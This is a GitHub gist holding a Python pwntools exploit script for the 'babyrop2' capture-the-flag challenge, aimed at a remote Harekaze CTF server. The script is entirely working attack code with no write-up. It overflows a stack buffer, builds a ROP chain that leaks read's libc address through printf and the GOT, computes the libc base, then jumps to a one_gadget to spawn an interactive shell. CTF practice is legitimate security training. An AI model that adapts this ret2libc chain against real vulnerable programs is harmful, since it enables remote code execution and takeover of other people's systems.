Skip to content

Instantly share code, notes, and snippets.

@ywkw1717 ywkw1717/babyrop2.py
Created May 19, 2019

Embed
What would you like to do?
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop2")
conn = remote("problem.harekaze.com", 20005)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
pop_rdi_ret = 0x400733 #: pop rdi ; ret
one_gadget = 0x45216 # constraints: rax == NULL
xor_rax_ret = 0x8b8c5 #: xor rax, rax ; ret
# first
payload = "A" * 32
payload += p64(0xdeadbeef) # rbp
payload += p64(pop_rdi_ret)
payload += p64(elf.got['read'])
payload += p64(elf.plt['printf'])
payload += p64(elf.symbols["main"])
print conn.recvuntil("What's your name?")
conn.sendline(payload)
print conn.recvuntil("Welcome to the Pwn World again,")
print conn.recvuntil("\n")
leak_addr = u64(conn.recv(6) + "\x00\x00")
libc_base = leak_addr - libc.symbols["read"]
print hex(leak_addr)
print hex(libc_base)
# second
payload = "A" * 32
payload += p64(0xdeadbeef) # rbp
payload += p64(libc_base + xor_rax_ret)
payload += p64(libc_base + one_gadget)
print conn.recvuntil("What's your name?")
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.